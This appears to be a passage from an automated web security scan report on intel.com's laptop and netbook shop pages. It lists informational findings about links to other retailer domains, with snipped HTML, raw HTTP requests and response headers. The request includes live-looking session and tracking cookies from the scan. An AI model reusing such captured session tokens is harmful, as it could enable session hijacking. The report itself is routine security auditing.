<h3><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_SSD-T/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Xtreme SSD&prc=879.00" target="_blank"> CyberPower Xtreme SSD</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_SSD-T/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Xtreme SSD&prc=879.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Infinity_Killer_8000/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Inf. Killer 8000&prc=995.00" target="_blank"><img src="http://www.cyberpowerpc.com/images/cs/blade/01_150.jpg" alt="CyberPower Inf. Killer 8000 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Infinity_Killer_8000/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Inf. Killer 8000&prc=995.00" target="_blank"> CyberPower Inf. Killer 8000</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Infinity_Killer_8000/#&manufacturer=CyberPower&processor=Core i5&offerSeller=CyberPower&model=CyberPower Inf. Killer 8000&prc=995.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.cyberpowerpc.com/system/Rattler/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Rattler&prc=999.00" target="_blank"><img src="http://www.cyberpowerpc.com/images/cs/ap970/01_150.jpg" alt="CyberPower Rattler image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.cyberpowerpc.com/system/Rattler/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Rattler&prc=999.00" target="_blank"> CyberPower Rattler</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.cyberpowerpc.com/system/Rattler/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Rattler&prc=999.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_3000/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Gamer Xtreme 3000&prc=1059.00" target="_blank"><img src="http://www.cyberpowerpc.com/images/cs/haf912/blk_150.jpg" alt="CyberPower Gamer Xtreme 3000 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_3000/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Gamer Xtreme 3000&prc=1059.00" target="_blank"> CyberPower Gamer Xtreme 3000</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_3000/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Gamer Xtreme 3000&prc=1059.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Infinity_8800_Pro/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Inf. 8800 Pro&prc=1235.00" target="_blank"><img src="http://www.cyberpowerpc.com/images/cs/blackstorm/wht_150.jpg" alt="CyberPower Inf. 8800 Pro image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Infinity_8800_Pro/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Inf. 8800 Pro&prc=1235.00" target="_blank"> CyberPower Inf. 8800 Pro</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Infinity_8800_Pro/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Inf. 8800 Pro&prc=1235.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_5200/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Xtreme 5200&prc=1339.00" target="_blank"><img src="http://www.cyberpowerpc.com/images/cs/solano/01_150.jpg" alt="CyberPower Xtreme 5200 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_5200/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Xtreme 5200&prc=1339.00" target="_blank"> CyberPower Xtreme 5200</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_5200/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Xtreme 5200&prc=1339.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_5000/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Xtreme 5000&prc=1439.00" target="_blank"><img src="http://www.cyberpowerpc.com/images/cs/ap970/01_150.jpg" alt="CyberPower Xtreme 5000 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_5000/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Xtreme 5000&prc=1439.00" target="_blank"> CyberPower Xtreme 5000</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_5000/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Xtreme 5000&prc=1439.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_6000/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Xtreme 6000&prc=1445.00" target="_blank"><img src="http://www.cyberpowerpc.com/images/cs/cmstorm/blk_150.jpg" alt="CyberPower Xtreme 6000 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_6000/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Xtreme 6000&prc=1445.00" target="_blank"> CyberPower Xtreme 6000</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.cyberpowerpc.com/system/Gamer_Xtreme_6000/#&manufacturer=CyberPower&processor=Core i7&offerSeller=CyberPower&model=CyberPower Xtreme 6000&prc=1445.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.141. http://www.intel.com/shop/laptops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /shop/laptops

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/shop/laptops?iid=subhdr+shop_notebook
The response contains the following links to other domains:
  • http://intelfeed.ihvweb6.com/images/3_545300.jpg
  • http://intelfeed.ihvweb6.com/images/3_547616.jpg
  • http://intelfeed.ihvweb6.com/images/3_553967.jpg
  • http://www.amazon.com/Acer-AS5741-5763-i3-350M-Processor-Super-Multi/dp/B003KK6AF6/ref=sr_1_1?s=pc&ie=UTF8&qid=1281636486&sr=1-1
  • http://www.bestbuy.com/site/Sony%20-%20VAIO%20Laptop%20/%20Intel&#174;%20Core&#153;%20i3%20Processor%20/%2015.5"%20Display%20/%204GB%20Memory%20/%20320GB%20Hard%20Drive%20-%20Gunmetal%20Black/1235144.p?id=1218239967225&skuId=1235144&st=sony vaio&contract_desc=null#&manufacturer=Sony&processor=Core i3&offerSeller=BestBuy&model=Sony VPCEB33FM/BJ&prc=649.00
  • http://www.costco.com/Browse/Product.aspx?Prodid=11596679&whse=BC&Ne=4000000&eCat=BC|84|56670|78129&N=4047232&Mo=43&pos=0&No=35&Nr=P_CatalogName:BC&cat=78129&Ns=P_Price|1||P_SignDesc1&lang=en-US&Sp=C&ec=BC-EC10590-Cat56670&topnav=
  • http://www.costco.com/Browse/Product.aspx?Prodid=11599859&whse=BC&Ne=4000000&eCat=BC|84|56670|78129&N=4047232&Mo=43&pos=0&No=30&Nr=P_CatalogName:BC&cat=78129&Ns=P_Price|1||P_SignDesc1&lang=en-US&Sp=C&ec=BC-EC10590-Cat56670&topnav=
  • http://www.costco.com/Browse/Product.aspx?Prodid=11605514&whse=BC&Ne=4000000&eCat=BC|84|56670|78129&N=4047232&Mo=43&pos=0&No=36&Nr=P_CatalogName:BC&cat=78129&Ns=P_Price|1||P_SignDesc1&lang=en-US&Sp=C&ec=BC-EC10590-Cat56670&topnav=
  • http://www.dell.com/content/topics/segtopic.aspx/core_i3_i5_systems?c=us&cs=19&l=en&s=dhs
  • http://www.dell.com/content/topics/topic.aspx/global/products/ltd/en/us/dhs/inspiron_14_dndoun1?c=us&cs=19&l=en&s=dhs
  • http://www.dell.com/content/topics/topic.aspx/global/products/ltd/en/us/dhs/inspiron_1564_fndova2?c=us&cs=19&l=en&s=dhs
  • http://www.frys.com/product/6413132
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.walmart.com/catalog/product.do?product_id=15230130

Request

GET /shop/laptops?iid=subhdr+shop_notebook HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Content-Type: text/html;charset=utf-8
Content-Language: en
Server: IA Web Server
Date: Sat, 05 Feb 2011 23:20:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=zCWpNNbbfj2TPP5WPQLRJdYMHz64JZTNhRVDR2GspJGQv5dLhJrB!-824261870; path=/; HttpOnly=
Content-Length: 606349


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.dell.com/content/topics/topic.aspx/global/products/ltd/en/us/dhs/inspiron_14_dndoun1?c=us&amp;cs=19&amp;l=en&amp;s=dhs#&manufacturer=Dell&processor=Core i3&offerSeller=Dell&model=Dell Inspiron 1464&prc=549.00" target="_blank"><img src="http://www.intel.com/core/shopdata/Dell_25_10255_.jpg" alt="Dell Inspiron 1464 image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.dell.com/content/topics/topic.aspx/global/products/ltd/en/us/dhs/inspiron_14_dndoun1?c=us&amp;cs=19&amp;l=en&amp;s=dhs#&manufacturer=Dell&processor=Core i3&offerSeller=Dell&model=Dell Inspiron 1464&prc=549.00" target="_blank"> Dell Inspiron 1464</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.dell.com/content/topics/topic.aspx/global/products/ltd/en/us/dhs/inspiron_14_dndoun1?c=us&amp;cs=19&amp;l=en&amp;s=dhs#&manufacturer=Dell&processor=Core i3&offerSeller=Dell&model=Dell Inspiron 1464&prc=549.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11596679&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|56670|78129&amp;N=4047232&amp;Mo=43&amp;pos=0&amp;No=35&amp;Nr=P_CatalogName:BC&amp;cat=78129&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;ec=BC-EC10590-Cat56670&amp;topnav=#&manufacturer=Dell&processor=Core i3&offerSeller=Costco.com&model=Dell Inspiron 14&prc=549.99" target="_blank"><img src="http://intelfeed.ihvweb6.com/images/3_545300.jpg" alt="Dell Inspiron 14 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11596679&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|56670|78129&amp;N=4047232&amp;Mo=43&amp;pos=0&amp;No=35&amp;Nr=P_CatalogName:BC&amp;cat=78129&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;ec=BC-EC10590-Cat56670&amp;topnav=#&manufacturer=Dell&processor=Core i3&offerSeller=Costco.com&model=Dell Inspiron 14&prc=549.99" target="_blank"> Dell Inspiron 14</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11596679&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|56670|78129&amp;N=4047232&amp;Mo=43&amp;pos=0&amp;No=35&amp;Nr=P_CatalogName:BC&amp;cat=78129&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;ec=BC-EC10590-Cat56670&amp;topnav=#&manufacturer=Dell&processor=Core i3&offerSeller=Costco.com&model=Dell Inspiron 14&prc=549.99" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11605514&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|56670|78129&amp;N=4047232&amp;Mo=43&amp;pos=0&amp;No=36&amp;Nr=P_CatalogName:BC&amp;cat=78129&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;ec=BC-EC10590-Cat56670&amp;topnav=#&manufacturer=Dell&processor=Core i3&offerSeller=Costco.com&model=Dell Inspiron 15&prc=549.99" target="_blank"><img src="http://intelfeed.ihvweb6.com/images/3_553967.jpg" alt="Dell Inspiron 15 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11605514&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|56670|78129&amp;N=4047232&amp;Mo=43&amp;pos=0&amp;No=36&amp;Nr=P_CatalogName:BC&amp;cat=78129&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;ec=BC-EC10590-Cat56670&amp;topnav=#&manufacturer=Dell&processor=Core i3&offerSeller=Costco.com&model=Dell Inspiron 15&prc=549.99" target="_blank"> Dell Inspiron 15</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11605514&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|56670|78129&amp;N=4047232&amp;Mo=43&amp;pos=0&amp;No=36&amp;Nr=P_CatalogName:BC&amp;cat=78129&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;ec=BC-EC10590-Cat56670&amp;topnav=#&manufacturer=Dell&processor=Core i3&offerSeller=Costco.com&model=Dell Inspiron 15&prc=549.99" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.dell.com/content/topics/topic.aspx/global/products/ltd/en/us/dhs/inspiron_1564_fndova2?c=us&amp;cs=19&amp;l=en&amp;s=dhs#&manufacturer=Dell&processor=Core i3&offerSeller=Dell&model=Dell Inspiron 1564&prc=589.00" target="_blank"><img src="http://www.intel.com/core/shopdata/Dell_25_18798_Dell-Inspiron-17_Laptop_3-1.jpg" alt="Dell Inspiron 1564 image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.dell.com/content/topics/topic.aspx/global/products/ltd/en/us/dhs/inspiron_1564_fndova2?c=us&amp;cs=19&amp;l=en&amp;s=dhs#&manufacturer=Dell&processor=Core i3&offerSeller=Dell&model=Dell Inspiron 1564&prc=589.00" target="_blank"> Dell Inspiron 1564</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.dell.com/content/topics/topic.aspx/global/products/ltd/en/us/dhs/inspiron_1564_fndova2?c=us&amp;cs=19&amp;l=en&amp;s=dhs#&manufacturer=Dell&processor=Core i3&offerSeller=Dell&model=Dell Inspiron 1564&prc=589.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.walmart.com/catalog/product.do?product_id=15230130#&manufacturer=Acer&processor=Core i3&offerSeller=WalMart&model=Acer AS5742&prc=598.00" target="_blank"><img src="http://www.intel.com/core/shopdata/Acer_25_65690_AS5742.jpg" alt="Acer AS5742 image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.walmart.com/catalog/product.do?product_id=15230130#&manufacturer=Acer&processor=Core i3&offerSeller=WalMart&model=Acer AS5742&prc=598.00" target="_blank"> Acer AS5742</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.walmart.com/catalog/product.do?product_id=15230130#&manufacturer=Acer&processor=Core i3&offerSeller=WalMart&model=Acer AS5742&prc=598.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11599859&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|56670|78129&amp;N=4047232&amp;Mo=43&amp;pos=0&amp;No=30&amp;Nr=P_CatalogName:BC&amp;cat=78129&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;ec=BC-EC10590-Cat56670&amp;topnav=#&manufacturer=Dell&processor=Core i3&offerSeller=Costco.com&model=Dell Inspiron 15&prc=599.99" target="_blank"><img src="http://intelfeed.ihvweb6.com/images/3_547616.jpg" alt="Dell Inspiron 15 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11599859&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|56670|78129&amp;N=4047232&amp;Mo=43&amp;pos=0&amp;No=30&amp;Nr=P_CatalogName:BC&amp;cat=78129&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;ec=BC-EC10590-Cat56670&amp;topnav=#&manufacturer=Dell&processor=Core i3&offerSeller=Costco.com&model=Dell Inspiron 15&prc=599.99" target="_blank"> Dell Inspiron 15</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11599859&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|56670|78129&amp;N=4047232&amp;Mo=43&amp;pos=0&amp;No=30&amp;Nr=P_CatalogName:BC&amp;cat=78129&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;ec=BC-EC10590-Cat56670&amp;topnav=#&manufacturer=Dell&processor=Core i3&offerSeller=Costco.com&model=Dell Inspiron 15&prc=599.99" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.frys.com/product/6413132#&manufacturer=Gateway&processor=Core i3&offerSeller=Frys&model=Gateway NV55C28u&prc=629.00" target="_blank"><img src="http://www.intel.com/core/shopdata/Gateway_25_69798_.jpg" alt="Gateway NV55C28u image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.frys.com/product/6413132#&manufacturer=Gateway&processor=Core i3&offerSeller=Frys&model=Gateway NV55C28u&prc=629.00" target="_blank"> Gateway NV55C28u</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.frys.com/product/6413132#&manufacturer=Gateway&processor=Core i3&offerSeller=Frys&model=Gateway NV55C28u&prc=629.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.amazon.com/Acer-AS5741-5763-i3-350M-Processor-Super-Multi/dp/B003KK6AF6/ref=sr_1_1?s=pc&amp;ie=UTF8&amp;qid=1281636486&amp;sr=1-1#&manufacturer=Acer&processor=Core i3&offerSeller=Amazon&model=Acer Aspire AS5741&prc=629.00" target="_blank"><img src="http://www.intel.com/core/shopdata/Acer_25_249_AS5741.jpg" alt="Acer Aspire AS5741 image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.amazon.com/Acer-AS5741-5763-i3-350M-Processor-Super-Multi/dp/B003KK6AF6/ref=sr_1_1?s=pc&amp;ie=UTF8&amp;qid=1281636486&amp;sr=1-1#&manufacturer=Acer&processor=Core i3&offerSeller=Amazon&model=Acer Aspire AS5741&prc=629.00" target="_blank"> Acer Aspire AS5741</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.amazon.com/Acer-AS5741-5763-i3-350M-Processor-Super-Multi/dp/B003KK6AF6/ref=sr_1_1?s=pc&amp;ie=UTF8&amp;qid=1281636486&amp;sr=1-1#&manufacturer=Acer&processor=Core i3&offerSeller=Amazon&model=Acer Aspire AS5741&prc=629.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.dell.com/content/topics/segtopic.aspx/core_i3_i5_systems?c=us&amp;cs=19&amp;l=en&amp;s=dhs#&manufacturer=Dell&processor=Core i3&offerSeller=Dell&model=Dell Inspiron 17 (1764) &prc=629.00" target="_blank"><img src="http://www.intel.com/core/shopdata/Dell_25_876_Dell-Inspiron-17_Laptop_3-1.jpg" alt="Dell Inspiron 17 (1764) image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.dell.com/content/topics/segtopic.aspx/core_i3_i5_systems?c=us&amp;cs=19&amp;l=en&amp;s=dhs#&manufacturer=Dell&processor=Core i3&offerSeller=Dell&model=Dell Inspiron 17 (1764) &prc=629.00" target="_blank"> Dell Inspiron 17 (1764) </a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.dell.com/content/topics/segtopic.aspx/core_i3_i5_systems?c=us&amp;cs=19&amp;l=en&amp;s=dhs#&manufacturer=Dell&processor=Core i3&offerSeller=Dell&model=Dell Inspiron 17 (1764) &prc=629.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.bestbuy.com/site/Sony+-+VAIO+Laptop+/+Intel%26%23174%3B+Core%26%23153%3B+i3+Processor+/+15.5%22+Display+/+4GB+Memory+/+320GB+Hard+Drive+-+Gunmetal+Black/1235144.p?id=1218239967225&amp;skuId=1235144&amp;st=sony vaio&amp;contract_desc=null#&manufacturer=Sony&processor=Core i3&offerSeller=BestBuy&model=Sony VPCEB33FM/BJ&prc=649.00" target="_blank"><img src="http://www.intel.com/core/shopdata/Sony_25_21474_.jpg" alt="Sony VPCEB33FM/BJ image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.bestbuy.com/site/Sony+-+VAIO+Laptop+/+Intel%26%23174%3B+Core%26%23153%3B+i3+Processor+/+15.5%22+Display+/+4GB+Memory+/+320GB+Hard+Drive+-+Gunmetal+Black/1235144.p?id=1218239967225&amp;skuId=1235144&amp;st=sony vaio&amp;contract_desc=null#&manufacturer=Sony&processor=Core i3&offerSeller=BestBuy&model=Sony VPCEB33FM/BJ&prc=649.00" target="_blank"> Sony VPCEB33FM/BJ</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.bestbuy.com/site/Sony+-+VAIO+Laptop+/+Intel%26%23174%3B+Core%26%23153%3B+i3+Processor+/+15.5%22+Display+/+4GB+Memory+/+320GB+Hard+Drive+-+Gunmetal+Black/1235144.p?id=1218239967225&amp;skuId=1235144&amp;st=sony vaio&amp;contract_desc=null#&manufacturer=Sony&processor=Core i3&offerSeller=BestBuy&model=Sony VPCEB33FM/BJ&prc=649.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.142. http://www.intel.com/shop/netbooks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /shop/netbooks

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/shop/netbooks?iid=subhdr+shop_intdev
The response contains the following links to other domains:
  • http://intelfeed.ihvweb6.com/images/3_550352.jpg
  • http://mobility.mirusinnovations.com/configure?product=121862
  • http://mobility.mirusinnovations.com/configure?product=136776
  • http://mobility.mirusinnovations.com/images/products/121862_590x442.png
  • http://mobility.mirusinnovations.com/images/products/136776_590x442.png
  • http://shop.lenovo.com/SEUILibrary/controller/e/web/LenovoPortal/en_US/catalog.workflow:item.detail?x=x&vt=5&GroupID=243&Code=064733U&hide_menu_area=true
  • http://www.amazon.com/Asus-1001P-MU17-BK-10-1-Inch-Netbook-Computer/dp/B00322PYUY/ref=sr_1_8?ie=UTF8&s=pc&qid=1274130608&sr=1-8
  • http://www.amazon.com/Seashell-1005PE-PU17-BK-10-1-Inch-Netbook-Battery/dp/B00322PYZO/ref=sr_1_3?ie=UTF8&s=pc&qid=1274130608&sr=1-3
  • http://www.costco.com/Browse/Product.aspx?Prodid=11602446&whse=BC&Ne=4000000&eCat=BC|84|78454&N=4047244&Mo=1&No=0&Nr=P_CatalogName:BC&cat=78454&Ns=P_Price|1||P_SignDesc1&lang=en-US&Sp=C&topnav=
  • http://www.dell.com/us/en/home/notebooks/inspiron-1012/pd.aspx?refid=inspiron-1012&s=dhs&cs=19&~oid=us~en~29~laptop-inspiron-10_anav_2~~
  • http://www.dell.com/us/en/home/notebooks/laptop-inspiron-10/pd.aspx?refid=laptop-inspiron-10&s=dhs&cs=19&~oid=us~en~29~laptop-inspiron-10-new_anav1~~
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&category=notebooks&a1=Category&v1=Mini&series_name=mini210_series&jumpid=in_R329_prodexp/hhoslp/psg/notebooks/Mini/mini210_series
  • http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&category=notebooks&a1=Category&v1=Mini&series_name=mini311_series&jumpid=in_R329_prodexp/hhoslp/psg/notebooks/Mini/mini311_series

Request

GET /shop/netbooks?iid=subhdr+shop_intdev HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
